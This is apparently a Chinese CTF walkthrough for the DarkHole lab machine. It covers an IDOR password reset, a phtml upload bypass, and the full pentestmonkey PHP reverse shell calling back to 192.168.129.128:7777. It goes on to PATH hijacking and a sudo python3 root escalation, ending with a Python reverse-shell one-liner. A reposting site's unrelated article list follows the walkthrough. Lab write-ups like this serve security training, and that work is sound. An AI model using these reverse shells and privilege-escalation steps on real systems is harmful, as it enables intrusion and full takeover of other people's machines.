DarkHole

信息收集

查看靶机IP

arp-scan -l

nmap -O 132.168.129.0/24 --min-rate 1000

得到目标靶机IP为192.168.129.138

查看开放的端口,有22、80端口

目录扫描

dirsearch -u "192.168.129.138"

dirb http://192.168.129.138

有注册登录界面,upload界面,dashboard.php是网站页面,都访问下看看

访问网站http://192.168.129.138

源码没有东西,有一个登陆的选项

尝试注册admin账号,发现提示已经注册过了

注册登录下,这是登陆成功的页面内容,然后有一个id=4,这就很容易联想admin的id应该是1

抓包

修改password密码进行抓包,将id修改成1,然后放行

返回主界面进行登录,id=1对应的是admin账号,用admin账号进行登录,密码是我们修改后的密码8

可以看到成功登录admin账号,此时账号中多了一个上传的入口

这个上传存在过滤,只能上传图片,经过尝试发现还可以上传phtml文件,这里利用反向连接shell

注意要将phtml文件中的内容ip和端口修改成自己需要的

<?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. The author accepts no liability // for damage caused by this tool. If these terms are not acceptable to you, then // do not use this tool. // // In all other respects the GPL version 2 applies: // // This program is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License version 2 as // published by the Free Software Foundation. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License along // with this program; if not, write to the Free Software Foundation, Inc., // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. If these terms are not acceptable to // you, then do not use this tool. // // You are encouraged to send comments, improvements or suggestions to // me at pentestmonkey@pentestmonkey.net // // Description // ----------- // This script will make an outbound TCP connection to a hardcoded IP and port. // The recipient will be given a shell running as the current user (apache normally). // // Limitations // ----------- // proc_open and stream_set_blocking require PHP version 4.3+, or 5+ // Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows. // Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available. // // Usage // ----- // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. set_time_limit (0); $VERSION = "1.0"; $ip = '192.168.129.128'; // CHANGE THIS $port = 7777; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } // Change to a safe directory chdir("/"); // Remove any umask we inherited umask(0); // // Do the reverse shell... // // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } // Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } // Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } // Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } // If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } // If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); // Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>

接着访问http://192.168.129.138/upload/1.phtml

在kali中开启监听

nc -lvvp 7777

获取shell

进行交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

接着查看内容,肯定是想让我们的权限先升级到普通用户

查看/etc/passwd(/etc/passwd 是 Linux/Unix 系统中存储所有用户账户基础信息的核心系统文件,包含系统用户、普通用户、服务账户的关键配置,所有用户(包括普通用户)都能读取该文件,但密码信息已移至更安全的 /etc/shadow)

cat /etc/passwd

darkhole:x:1000:1000:john:/home/darkhole:/bin/bash(备注关联John用户)

/bin/bash(可交互式登录)

然后就是查看一下目录的内容

在/home目录下看到了john用户,john目录下只有toto文件有权限查看

运行一下toto文件,运行发现是似乎用john的身份执行了id命令。利用这个来获取John普通用户权限

我们可以通过修改PATH环境变量,让高权限的程序执行我们自定义的脚本,从而实现从www-data用户踢拳道john用户( Linux 环境变量劫持提权,PATH 注入攻击)

echo '/bin/bash' >tmp/id chmod 777 /tmp/id export PATH=/tmp:$PSTH ./toto

在/tmp目录下创建一个名为id的文件,内容是/bin/bash(即执行 bash shell)。因为目标程序./toto会调用id命令,我们用这个恶意脚本替换系统默认的id命令。

赋予其777的权限,所有用户都可以读写执行该文件,确保后续程序能正常运行这个恶意脚本

设置环境变量,修改系统的PATH变量,把/tmp目录放到PATH的最前面。Linux 执行命令时,会按PATH的顺序查找命令。原本id命令在/usr/bin/id,现在PATH最前面是/tmp,所以系统会优先执行/tmp/id(我们的恶意脚本)。

完成这些操作后,可以看到变成john用户了

现在可以正常查看/home/john目录下的文件内容

得到john用户的密码和第一个flag

提权

sudo -l 查看一下john的权限

允许john用户可以以root权限利用python3进行运行file.py

方法1:

但是file.py是空的,需要输入import os;os system('/bin/bash'),调用系统命令执行/bin/bash

echo "import os;os system('/bin/bash')" >file.py

sudo python3 /home/john/file.py

root目录下查看root.txt得到最后一个flag

/bin/bash 是 Linux/Unix 系统中最核心的交互式命令解释器(Shell),可以把它理解成 “系统和用户之间的翻译官”—— 你在终端输入的所有命令(比如 ls、cd、chmod),都是由 bash 接收、解析并转交给内核执行的,而 /bin/bash 就是这个程序在系统中的具体存放路径。

方法2:

进行监听

import os,pty,socket;s=socket.socket();s.connect(("192.168.129.128",7777));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")

也是可以监听成功,就切换到root用户

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1189359.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【技术硬核】没有 PSD 源文件怎么办?揭秘 AI 如何将 JPG 图片“逆向分层”实现无损翻译

Python 图像分层 Layer Decomposition 智能避让 计算机视觉 跨境电商摘要在跨境电商的供应链中&#xff0c;90% 的卖家拿到的素材都是 “扁平化”的 JPG/PNG 图片&#xff0c;这意味着文字、背景和产品已经“焊死”在一起&#xff0c;无法独立编辑。当翻译后的外语文本长度暴涨…

哈尔滨市英语雅思培训辅导机构推荐,2026权威出国雅思课程中心学校口碑排行榜 - 苏木2025

在全球化留学热潮持续升温的背景下,雅思考试已成为哈尔滨学子通往海外名校的关键门槛。然而,众多考生在雅思培训备考过程中普遍面临诸多痛点:优质培训资源筛选困难、选课盲目无方向、缺乏个性化提分方案、考试技巧掌…

Spring Boot 实现网络限速,一个注解搞定!

概述本文介绍在 Spring Boot 3 中实现多维度网络带宽限速的完整方案。基于令牌桶算法手动实现核心逻辑&#xff0c;通过自定义 HandlerInterceptor 拦截请求、HttpServletResponseWrapper 包装响应流、RateLimitedOutputStream 控制输出速率&#xff0c;实现对文件下载、视频流…

libero ProASIC3 A3P250 JTAG-DirectC 源码分析三 dp_program_from

libero ProASIC3 A3P250 JTAG-DirectC 源码分析三 dp_program_from

2026年市场评价高的保温装饰一体化板公司怎么选,石墨聚苯板保温装饰一体板,保温装饰一体化板生产商如何选 - 品牌推荐师

引言 保温装饰一体化板作为建筑外墙节能的核心材料,兼具保温隔热、装饰美观与防火安全功能,是推动绿色建筑发展的关键环节。尤其在“双碳”目标下,其市场需求持续攀升,但行业准入门槛低导致产品质量参差不齐,采购…

2026年国内专业的一体板订制厂家如何选,聚氨酯保温装饰一体板/一体板/石墨聚苯板保温装饰一体板,一体板品牌电话 - 品牌推荐师

评测背景:外墙装饰一体板市场迎来品质与服务双升级 随着建筑节能政策深化与绿色建筑需求激增,外墙装饰一体板作为集保温、装饰、防火功能于一体的新型建材,已成为住宅、商业及公共建筑的核心选择。然而,市场品牌混…

2026年流量计市场新动态:实力厂家高压流量计精选,插入式超声波流量计/管道式电磁流量计,流量计制造企业哪家好 - 品牌推荐师

行业背景与市场趋势 随着工业自动化与能源管理需求的持续攀升,高压流量计作为过程控制的核心设备,其市场正经历技术迭代与需求分化的双重变革。一方面,石油、化工、天然气等传统行业对高压介质测量的精度与稳定性提…

全栈小能手的烦恼:键盘敲累了还要开会

全栈小能手的烦恼&#xff1a;键盘敲累了还要开会如果你问我&#xff0c;什么时候意识到自己已经不再是“纯程序员”了&#xff1f;不是第一次写前端&#xff0c;也不是第一次带新人&#xff0c;而是——有一天&#xff0c;我发现自己一天没怎么敲代码&#xff0c;却异常疲惫。…

2025年行业内诚信的一对一家教老师怎么选择,科学家教/师范家教/一对一家教/语文家教/家救,一对一家教老师推荐排行榜 - 品牌推荐师

随着个性化教育需求的持续增长,一对一家教市场已成为家长提升孩子学业竞争力的重要选择。然而,行业分散化、服务标准化缺失等问题导致家长选择时面临信息不对称、效果难保障等痛点。据第三方教育平台统计,2024年杭州…

《把脉行业与技术趋势》-68-行业周期律以及背后的底层逻辑

行业周期律&#xff0c;是指特定行业在时间维度上呈现出的规律性兴衰更替现象。它并非随机波动&#xff0c;而是由经济、技术、政策、供需、资本等多重力量共同作用的结果。理解行业周期律及其底层逻辑&#xff0c;是投资者、创业者、职场人规避风险、捕捉机遇的核心能力。一、…

2026年纯铝锭厂家选购推荐/铝板,铝锭,铝箔,高温铝箔,包装用铝箔 - 品牌策略师

2026年纯铝锭厂家选购推荐/铝板,铝锭,铝箔,高温铝箔,包装用铝箔当前,全球制造业持续复苏,新能源汽车、航空航天、绿色建筑等高端领域对轻量化材料的需求不断攀升,纯铝锭作为基础工业原料,其市场前景广阔。随着…

可控生成策略在大语言模型摘要生成中的应用

运行效果:https://lunwen.yeel.cn/view.php?id=5810 可控生成策略在大语言模型摘要生成中的应用摘要:随着人工智能技术的快速发展,大语言模型在自然语言处理领域取得了显著成果。然而,在摘要生成方面,大语言模型…

2026年高口碑蒸汽发生器品牌TOP榜:全预混节能先锋、电蒸汽高效代表、燃气蒸汽发生器实力厂商全解析! - 品牌推荐大师1

一、行业背景与市场趋势​ 随着全球工业自动化与环保政策的推进,蒸汽发生器作为工业热能核心设备,市场需求持续增长。2026年,中国蒸汽发生器市场规模预计突破200亿元,其中电蒸汽、燃气蒸汽、全预混低氮锅炉成为主流…

AI自动化智能体与工作流平台直播课

关注 霍格沃兹测试学院公众号&#xff0c;回复「资料」, 领取人工智能测试开发技术合集每天埋头于重复性工作&#xff0c;点击、复制、粘贴、测试&#xff0c;你是否感到时间被无形吞噬&#xff1f;当同事们早早下班&#xff0c;你是否还在为明天的汇报手动整理最后一份数据报告…

rector-rules - 提供标准化的常量、变量、函数、类、属性和方法命名以及其他 Rector 规则

rector-rules - 提供标准化的常量、变量、函数、类、属性和方法命名以及其他 Rector 规则之前写过用 Rector 《统一规范化代码的命名风格》,现在已经整理发布为 Composer 包了。 rector-rules - 提供标准化的常量、变…

哈尔滨市英语雅思培训辅导机构推荐、2026权威出国雅思课程中心学校口碑排行榜 - 苏木2025

在雅思培训市场竞争激烈的当下,哈尔滨众多考生在选课过程中普遍面临优质教育机构难甄别、提分技巧不系统、个性化方案缺失等痛点。想要高效备战考试,斩获高分,选择一家靠谱的机构至关重要。基于此,我们开展全网深度…

避开Context

说明 之前脑抽想试试Context。 果不其然,和安卓里面的context一样都挺难用。 Context看上去可能很好,但是在维护时,context一点也不直观,跳到Context中看不到任何的数据和方法,需要再去找层级,传参。 结果还不如…

收藏!35+程序员转行大模型全攻略:从入门到求职落地,少走90%弯路

在技术迭代日新月异的当下&#xff0c;大模型领域凭借其广阔的应用场景、持续攀升的市场需求以及极具吸引力的薪资待遇&#xff0c;已然成为程序员群体转型的热门优选赛道。对于35岁以上的程序员而言&#xff0c;尽管面临着精力分配失衡、技术代际断层、职场竞争加剧等现实挑战…

哈尔滨市英语雅思培训辅导机构推荐:2026权威出国雅思课程中心学校口碑排行榜 - 苏木2025

在全球化留学热潮下,雅思考试已成为哈尔滨学子通往海外名校的核心门槛,优质的雅思培训则是斩获高分、实现留学目标的关键支撑。然而当前哈尔滨雅思培训市场鱼龙混杂,考生及家长普遍面临诸多痛点:难以在海量教育机构…

图像识别与语音融合的无障碍辅助系统

运行效果:https://lunwen.yeel.cn/view.php?id=5809 图像识别与语音融合的无障碍辅助系统摘要:随着科技的不断发展,图像识别和语音识别技术逐渐成熟,为无障碍辅助系统的发展提供了新的可能。本论文旨在设计并实现…